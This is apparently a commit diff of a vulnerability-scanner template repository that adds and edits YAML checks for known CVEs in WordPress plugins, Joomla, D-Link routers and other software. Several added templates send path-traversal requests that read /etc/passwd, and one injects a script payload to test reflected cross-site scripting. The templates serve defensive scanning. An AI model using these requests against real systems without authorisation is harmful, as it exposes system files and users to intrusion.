name: WordPress DZS-VideoGallery Plugin Reflected Cross-Site Scripting
name: WordPress DZS-VideoGallery Plugin Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.

4
cves/2014/CVE-2014-9444.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-9444
info:
name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting
name: Frontend Uploader <= 0.9.2 - Cross-Site Scripting
author: daffainfo
severity: medium
description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.
@ -12,7 +12,7 @@ info:
- http://web.archive.org/web/20210122092924/https://www.securityfocus.com/bid/71808/
classification:
cve-id: CVE-2014-9444
tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress
tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth
requests:
- method: GET

2
cves/2015/CVE-2015-1579.yaml
View File

@ -17,7 +17,7 @@ info:
cve-id: CVE-2015-1579
cwe-id: CWE-22
metadata:
google-dork: inurl:/wp-content/plugins/revslider
google-query: inurl:/wp-content/plugins/revslider
tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015
requests:

36
cves/2015/CVE-2015-4074.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2015-4074
info:
name: Joomla Helpdesk Pro plugin <1.4.0 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
reference:
- https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html
- https://www.exploit-db.com/exploits/37666/
- https://www.cvedetails.com/cve/CVE-2015-4074
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-4074
cwe-id: CWE-22
tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin
requests:
- method: GET
path:
- "{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by cs on 2022/09/08

8
cves/2015/CVE-2015-4127.yaml
View File

@ -1,16 +1,16 @@
id: CVE-2015-4127
info:
name: WordPress Plugin church_admin - Cross-Site Scripting (XSS)
name: WordPress Church Admin <0.810 - Cross-Site Scripting
author: daffainfo
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in the church_admin plugin before 0.810 for WordPress allows remote attackers to inject arbitrary web script or HTML via the address parameter, as demonstrated by a request to index.php/2015/05/21/church_admin-registration-form/.
WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.
reference:
- https://www.exploit-db.com/exploits/37112
- https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
- https://nvd.nist.gov/vuln/detail/CVE-2015-4127
- https://wordpress.org/plugins/church-admin/changelog/
- https://nvd.nist.gov/vuln/detail/CVE-2015-4127
classification:
cve-id: CVE-2015-4127
tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

33
cves/2015/CVE-2015-5469.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2015-5469
info:
name: Wordpress MDC YouTube Downloader plugin v2.1.0 - Remote file download
author: 0x_Akoko
severity: high
description: Absolute path traversal vulnerability in the MDC YouTube Downloader plugin 2.1.0 for WordPress allows remote attackers to read arbitrary files via a full pathname in the file parameter to includes/download.php.
reference:
- https://www.openwall.com/lists/oss-security/2015/07/10/5
- https://www.cvedetails.com/cve/CVE-2015-5469/
- http://www.vapid.dhs.org/advisory.php?v=133
- http://www.openwall.com/lists/oss-security/2015/07/10/5
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-5469
cwe-id: CWE-22
tags: cve,cve2015,wp,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

32
cves/2015/CVE-2015-7245.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2015-7245
info:
name: D-Link DVG-N5402SP - Path Traversal
author: 0x_Akoko
severity: high
description: |
Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
reference:
- https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
- https://www.exploit-db.com/exploits/39409/
- https://nvd.nist.gov/vuln/detail/CVE-2015-7245
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-7245
cwe-id: CWE-22
tags: cve,cve2015,dlink,lfi,packetstorm,edb
requests:
- raw:
- |
POST /cgibin/webproc HTTP/1.1
Host: {{Hostname}}
getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"

2
cves/2016/CVE-2016-1000141.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2016-1000141
info:
name: WordPress Page Layout builder v1.9.3 - Reflected Cross-Site Scripting
name: WordPress Page Layout builder v1.9.3 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability.

1
cves/2016/CVE-2016-2389.yaml
View File

@ -7,7 +7,6 @@ info:
description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
reference:
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
- https://www.cvedetails.com/cve/CVE-2016-2389
- http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
- https://www.exploit-db.com/exploits/39837/
- https://nvd.nist.gov/vuln/detail/CVE-2016-2389

2
cves/2016/CVE-2016-3088.yaml
View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2016-3088
cwe-id: CWE-20
tags: fileupload,kev,edb,cve,cve2016,apache,activemq
tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive
requests:
- raw:

32
cves/2016/CVE-2016-6601.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2016-6601
info:
name: ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal
author: 0x_Akoko
severity: high
description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
reference:
- https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
- https://www.exploit-db.com/exploits/40229/
- https://nvd.nist.gov/vuln/detail/CVE-2016-6601
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-6601
cwe-id: CWE-22
tags: edb,cve,cve2016,zoho,lfi,webnms
requests:
- method: GET
path:
- "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

8
cves/2017/CVE-2017-11629.yaml
View File

@ -1,15 +1,15 @@
id: CVE-2017-11629
info:
name: FineCms 5.0.10 - Cross Site Scripting
name: FineCMS <=5.0.10 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
dayrui FineCms through 5.0.10 has Cross Site Scripting (XSS) in controllers/api.php via the function parameter in a c=api&m=data2 request.
FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request.
reference:
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
- https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS
- https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -39,3 +39,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

2
cves/2017/CVE-2017-12615.yaml
View File

@ -19,7 +19,7 @@ info:
cwe-id: CWE-434
metadata:
shodan-query: title:"Apache Tomcat"
tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache
tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache,fileupload
requests:
- method: PUT

2
cves/2017/CVE-2017-14651.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2017-14651
info:
name: WSO2 Data Analytics Server 3.1.0 - Reflected Cross-Site Scripting
name: WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting
author: mass0ma
severity: medium
description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.

2
cves/2017/CVE-2017-15715.yaml
View File

@ -15,7 +15,7 @@ info:
cvss-score: 8.1
cve-id: CVE-2017-15715
cwe-id: CWE-20
tags: apache,httpd,fileupload,vulhub,cve,cve2017
tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive
requests:
- raw:

2
cves/2017/CVE-2017-5521.yaml
View File

@ -17,7 +17,7 @@ info:
cvss-score: 8.1
cve-id: CVE-2017-5521
cwe-id: CWE-200
tags: cve,cve2017,auth-bypass,netgear,router
tags: cve,cve2017,auth-bypass,netgear,router,kev
requests:
- method: GET

2
cves/2017/CVE-2017-6090.yaml
View File

@ -16,7 +16,7 @@ info:
cwe-id: CWE-434
metadata:
shodan-query: http.title:"PhpCollab"
tags: cve2017,phpcollab,rce,fileupload,edb,cve
tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive
requests:
- raw:

2
cves/2018/CVE-2018-11709.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2018-11709
info:
name: WordPress wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting
name: WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.

2
cves/2018/CVE-2018-15961.yaml
View File

@ -17,7 +17,7 @@ info:
cwe-id: CWE-434
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev
tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive
requests:
- raw:

42
cves/2018/CVE-2018-16139.yaml Normal file
View File

@ -0,0 +1,42 @@
id: CVE-2018-16139
info:
name: BIBLIOsoft BIBLIOpac 2008 - Cross Site Scripting
author: atomiczsec
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in BIBLIOsoft BIBLIOpac 2008 allows remote attackers to inject arbitrary web script or HTML via the db or action parameter to to bin/wxis.exe/bibliopac/.
reference:
- https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-16139
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16139
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-16139
cwe-id: CWE-79
metadata:
verified: true
shodan-query: title:"Bibliopac"
tags: cve,cve2018,xss,bibliopac,bibliosoft
requests:
- method: GET
path:
- '{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db="><script>prompt(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>prompt(document.domain)</script>.xrf'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

7
cves/2018/CVE-2018-19386.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2018-19386
info:
name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
name: SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
reference:
- https://www.cvedetails.com/cve/CVE-2018-19386/
- https://i.imgur.com/Y7t2AD6.png
- https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5
- https://nvd.nist.gov/vuln/detail/CVE-2018-19386
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -29,3 +30,5 @@ requests:
- type: word
words:
- '<a href="javascript:alert(document.domain)//'
# Enhanced by mp on 2022/08/31

10
cves/2018/CVE-2018-19439.yaml
View File

@ -1,14 +1,16 @@
id: CVE-2018-19439
info:
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
name: Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting
author: madrobot,dwisiswant0
severity: medium
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.
reference:
- http://web.archive.org/web/20210124221313/https://www.securityfocus.com/bid/106006/
- http://seclists.org/fulldisclosure/2018/Nov/58
- http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-19439
- http://seclists.org/fulldisclosure/2018/Nov/58
remediation: Fixed in later versions including 5.4.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -25,3 +27,5 @@ requests:
words:
- "<script>alert(1337)</script><!--</TITLE>"
part: body
# Enhanced by mp on 2022/08/31

5
cves/2018/CVE-2018-19749.yaml
View File

@ -5,10 +5,11 @@ info:
author: arafatansari
severity: medium
description: |
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/account-owner.php Owner name field.
DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field.
reference:
- https://github.com/domainmod/domainmod/issues/81
- https://www.exploit-db.com/exploits/45941/
- https://nvd.nist.gov/vuln/detail/CVE-2018-19749
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
@ -49,3 +50,5 @@ requests:
- 'contains(all_headers_3, "text/html")'
- "contains(body_3, '><script>alert(document.domain)</script></a>')"
condition: and
# Enhanced by mp on 2022/08/31

6
cves/2018/CVE-2018-19751.yaml
View File

@ -5,11 +5,11 @@ info:
author: arafatansari
severity: medium
description: |
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /admin/ssl-fields/add.php Display Name, Description & Notes fields parameters.
DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters.
reference:
- https://www.exploit-db.com/exploits/45947/
- https://nvd.nist.gov/vuln/detail/CVE-2018-19751
- https://github.com/domainmod/domainmod/issues/83
- https://nvd.nist.gov/vuln/detail/CVE-2018-19751
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
@ -58,3 +58,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

6
cves/2018/CVE-2018-19752.yaml
View File

@ -5,11 +5,11 @@ info:
author: arafatansari
severity: medium
description: |
DomainMOD through 4.11.01 has XSS via the assets/add/registrar.php notes,registrar field.
DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-19752
- https://github.com/domainmod/domainmod/issues/84
- https://www.exploit-db.com/exploits/45949/
- https://nvd.nist.gov/vuln/detail/CVE-2018-19752
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
@ -57,3 +57,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

7
cves/2018/CVE-2018-19877.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2018-19877
info:
name: Adiscon LogAnalyzer 4.1.7 - Cross Site Scripting
name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS) in the 'referer' parameter of the login.php file.
Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file.
reference:
- https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
- https://www.exploit-db.com/exploits/45958/
- https://nvd.nist.gov/vuln/detail/CVE-2018-19877
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -38,3 +39,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

5
cves/2018/CVE-2018-19892.yaml
View File

@ -5,10 +5,11 @@ info:
author: arafatansari
severity: medium
description: |
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters.
DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters.
reference:
- https://www.exploit-db.com/exploits/45959
- https://github.com/domainmod/domainmod/issues/85
- https://nvd.nist.gov/vuln/detail/CVE-2018-19892
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
@ -56,3 +57,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

5
cves/2018/CVE-2018-19914.yaml
View File

@ -5,10 +5,11 @@ info:
author: arafatansari
severity: medium
description: |
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field.
DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field.
reference:
- https://www.exploit-db.com/exploits/46375/
- https://github.com/domainmod/domainmod/issues/87
- https://nvd.nist.gov/vuln/detail/CVE-2018-19914
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
@ -49,3 +50,5 @@ requests:
- 'contains(all_headers_3, "text/html")'
- 'contains(body_3, "><script>alert(document.domain)</script></a>")'
condition: and
# Enhanced by mp on 2022/08/31

4
cves/2018/CVE-2018-20526.yaml
View File

@ -17,9 +17,9 @@ info:
cve-id: CVE-2018-20526
cwe-id: CWE-434
metadata:
google-dork: intitle:"Roxy file manager"
google-query: intitle:"Roxy file manager"
verified: "true"
tags: cve,cve2018,roxy,fileman,rce,upload,intrusive,packetstorm,edb
tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb
requests:
- raw:

2
cves/2018/CVE-2018-2628.yaml
View File

@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-2628
cwe-id: CWE-502
tags: cve,cve2018,oracle,weblogic,network,deserialization
tags: cve,cve2018,oracle,weblogic,network,deserialization,kev
network:
- inputs:

2
cves/2018/CVE-2018-5715.yaml
View File

@ -16,7 +16,7 @@ info:
cve-id: CVE-2018-5715
cwe-id: CWE-79
metadata:
google-dork: intext:"SugarCRM Inc. All Rights Reserved"
google-query: intext:"SugarCRM Inc. All Rights Reserved"
shodan-query: http.html:"SugarCRM Inc. All Rights Reserved"
tags: sugarcrm,xss,edb,cve,cve2018

2
cves/2019/CVE-2019-1010287.yaml
View File

@ -16,7 +16,7 @@ info:
cve-id: CVE-2019-1010287
cwe-id: CWE-79
metadata:
google-dork: inurl:"/timesheet/login.php"
google-query: inurl:"/timesheet/login.php"
tags: cve,cve2019,timesheet,xss
requests:

2
cves/2019/CVE-2019-1010290.yaml
View File

@ -7,8 +7,8 @@ info:
description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker
reference:
- https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/
- https://www.cvedetails.com/cve/CVE-2019-1010290
- http://dev.cmsmadesimple.org/project/files/729
- https://nvd.nist.gov/vuln/detail/CVE-2019-1010290
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1

0
vulnerabilities/wordpress/CVE-2019-10692.yaml → cves/2019/CVE-2019-10692.yaml
View File

2
cves/2019/CVE-2019-12593.yaml
View File

@ -16,7 +16,7 @@ info:
cve-id: CVE-2019-12593
cwe-id: CWE-22
metadata:
google-dork: Powered By IceWarp 10.4.4
google-query: Powered By IceWarp 10.4.4
shodan-query: title:"icewarp"
tags: cve,cve2019,lfi,icewarp

5
cves/2019/CVE-2019-14974.yaml
View File

@ -4,9 +4,10 @@ info:
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
author: madrobot
severity: medium
description: SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS.
description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.
reference:
- https://www.exploit-db.com/exploits/47247
- https://nvd.nist.gov/vuln/detail/CVE-2019-14974
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -27,3 +28,5 @@ requests:
words:
- "url = window.location.search.split(\"?desktop_url=\")[1]"
part: body
# Enhanced by mp on 2022/08/31

8
cves/2019/CVE-2019-15501.yaml
View File

@ -1,14 +1,14 @@
id: CVE-2019-15501
info:
name: LSoft ListServ - XSS
name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
author: LogicalHunter
severity: medium
description: Reflected cross site scripting (XSS) in L-Soft LISTSERV before 16.5-2018a exists via the /scripts/wa.exe OK parameter.
description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
reference:
- https://www.exploit-db.com/exploits/47302
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501
- https://nvd.nist.gov/vuln/detail/CVE-2019-15501
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -36,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

7
cves/2019/CVE-2019-15811.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2019-15811
info:
name: DomainMOD 4.13.0 - Cross-Site Scripting
name: DomainMOD <=4.13.0 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
DomainMOD 4.13.0 is vulnerable to Cross Site Scripting (XSS) via /reporting/domains/cost-by-month.php in Daterange parameters.
DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.
reference:
- https://www.exploit-db.com/exploits/47325
- https://github.com/domainmod/domainmod/issues/108
- https://nvd.nist.gov/vuln/detail/CVE-2019-15811
- https://zerodays.lol/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@ -44,3 +45,5 @@ requests:
- 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")'
- 'contains(body_2, "DomainMOD")'
condition: and
# Enhanced by mp on 2022/08/31

8
cves/2019/CVE-2019-15889.yaml
View File

@ -1,14 +1,14 @@
id: CVE-2019-15889
info:
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
name: WordPress Download Manager <2.9.94 - Cross-Site Scripting
author: daffainfo
severity: medium
description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
description: WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
- https://www.cybersecurity-help.cz/vdb/SB2019041819
- https://wordpress.org/plugins/download-manager/#developers
- https://nvd.nist.gov/vuln/detail/CVE-2019-15889
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -36,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

7
cves/2019/CVE-2019-16332.yaml
View File

@ -1,13 +1,14 @@
id: CVE-2019-16332
info:
name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
name: WordPress API Bearer Auth <20190907 - Cross-Site Scripting
author: daffainfo
severity: medium
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
description: WordPress API Bearer Auth plugin before 20190907 contains a cross-site scripting vulnerability. The server parameter is not correctly filtered in swagger-config.yaml.php.
reference:
- https://plugins.trac.wordpress.org/changeset/2152730
- https://wordpress.org/plugins/api-bearer-auth/#developers
- https://nvd.nist.gov/vuln/detail/CVE-2019-16332
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -35,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

8
cves/2019/CVE-2019-16525.yaml
View File

@ -1,15 +1,15 @@
id: CVE-2019-16525
info:
name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
name: WordPress Checklist <1.1.9 - Cross-Site Scripting
author: daffainfo
severity: medium
description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
description: WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-16525
- https://wordpress.org/plugins/checklist/#developers
- https://packetstormsecurity.com/files/154436/WordPress-Checklist-1.1.5-Cross-Site-Scripting.html
- https://plugins.trac.wordpress.org/changeset/2155029/
- https://nvd.nist.gov/vuln/detail/CVE-2019-16525
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -37,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

8
cves/2019/CVE-2019-16931.yaml
View File

@ -1,16 +1,16 @@
id: CVE-2019-16931
info:
name: Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS)
name: WordPress Visualizer <3.3.1 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart.
WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard.
reference:
- https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44
- https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
- https://nvd.nist.gov/vuln/detail/CVE-2019-16931
- https://wpvulndb.com/vulnerabilities/9893
- https://nvd.nist.gov/vuln/detail/CVE-2019-16931
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -44,3 +44,5 @@ requests:
